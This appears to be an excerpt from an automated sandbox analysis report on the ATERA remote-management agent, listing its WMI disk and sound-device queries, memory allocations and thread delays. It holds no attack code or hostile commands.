                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #2\&quot;&quot;
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #0&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #0\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #2&quot;} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #2\&quot;&quot;
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size,FreeSpace,Name FROM Win32_LogicalDisk where DriveType=3
                                Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Name from Win32_SoundDevice
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 1779DE20000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 177B77A0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 21C42070000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 21C5A750000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 2156BBE0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 2156C560000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 15E7D2A0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 15E7D840000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 24740A20000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 24759010000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 2162FF80000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 216484E0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 281BDB60000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 281D61D0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeMemory allocated: 2EF73FE0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeMemory allocated: 2EF74460000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMemory allocated: 1F71CC20000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMemory allocated: 1F735420000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeMemory allocated: 2203A0F0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeMemory allocated: 22052770000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeMemory allocated: 214718E0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeMemory allocated: 21471D80000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeMemory allocated: 18457BE0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeMemory allocated: 1846FE90000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMemory allocated: 22B825A0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMemory allocated: 22B9A680000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeMemory allocated: 153FCF80000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeMemory allocated: 153FD520000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeMemory allocated: 25FBF6C0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeMemory allocated: 25FD7AE0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMemory allocated: 29E214A0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMemory allocated: 29E39CC0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599891
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599754
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599625
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599498
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599389
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599022
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598906
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598797
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598687
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598578
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598469
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598359
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598250
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598031
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597921
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597812
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597703
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597594
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597485
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597375
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597256
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597135
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597031
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596911
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596782
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596612
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596360
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599879
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599756
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599610
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599490
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599360
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599250
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599136
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599016
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598906
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598789
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598672
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598563
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598453
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598340
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598216
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598107
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597985
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597860
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597735
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597610
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597468
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597359
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597244
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597130
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596890
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596781
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596672
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596563
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596449
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596328
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596215
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596098
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595969
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595860
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595747
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595637
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595464
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595356
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595225
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595106
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594993
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594875
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594764
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594641
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594531
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594419
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594297
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594188
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594075
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593953
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593844
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593732
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599812
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599685
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599574
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599468
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599359
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599249
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599140
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599011
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598882
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598731
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598624
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598504
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598390
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598281
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598138
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598015
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597848
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597734
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597621
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597515
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597403
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597294
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597187
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597075
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596960
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596852
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596745
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596627
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596513
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596404
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596296
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596187
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596067
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595909
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595672
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595530
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595380
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595265
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595156
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595046
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594934
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594797
